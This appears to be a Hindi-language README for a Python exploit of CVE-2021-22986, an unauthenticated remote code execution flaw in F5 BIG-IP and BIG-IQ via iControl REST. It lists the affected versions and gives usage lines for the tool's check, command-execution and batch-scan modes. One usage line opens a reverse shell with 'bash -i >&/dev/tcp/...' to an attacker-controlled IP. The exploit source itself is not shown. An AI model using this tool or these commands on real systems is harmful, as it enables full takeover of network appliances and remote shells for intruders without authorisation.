
CVE-2021-22986 के लिए Python शोषण, iControl REST के माध्यम से F5 BIG-IP और BIG-IQ पर अनधिकृत RCE सक्षम करना, कमांड निष्पादन, बैच स्कैनिंग और रिवर्स शेल सुविधाओं के साथ।
यह भेद्यता बिना प्रमाणीकरण वाले हमलावरों को, जिनके पास BIG-IP प्रबंधन इंटरफ़ेस और सेल्फ IP पतों के माध्यम से iControl REST इंटरफ़ेस तक नेटवर्क पहुंच है, मनमाने सिस्टम कमांड निष्पादित करने, फ़ाइलें बनाने या हटाने और सेवाओं को अक्षम करने की अनुमति देती है। इस भेद्यता का शोषण केवल कंट्रोल प्लेन के माध्यम से किया जा सकता है, डेटा प्लेन के माध्यम से नहीं। शोषण के परिणामस्वरूप सिस्टम से पूर्ण समझौता हो सकता है। एप्लायंस मोड में BIG-IP सिस्टम भी असुरक्षित है।
F5 BIG-IQ 6.0.0-6.1.0 F5 BIG-IQ 7.0.0-7.0.0.1 F5 BIG-IQ 7.1.0-7.1.0.2 F5 BIG-IP 12.1.0-12.1.5.2 F5 BIG-IP 13.1.0-13.1.3.5 F5 BIG-IP 14.1.0-14.1.3.1 F5 BIG-IP 15.1.0-15.1.2 F5 BIG-IP 16.0.0-16.0.1
python3 CVE_2021_22986.py
python3 CVE_2021_22986.py -v true -u https://192.168.174.164
python3 CVE_2021_22986.py -a true -u https://192.168.174.164 -c id
python3 CVE_2021_22986.py -a true -u https://192.168.174.164 -c whoami
python3 CVE_2021_22986.py -s true -f check.txt
python3 CVE_2021_22986.py -r true -u https://192.168.174.164 -c "bash -i >&/dev/tcp/192.168.174.129/8888 0>&1"
python3 newpoc.py https://192.168.174.164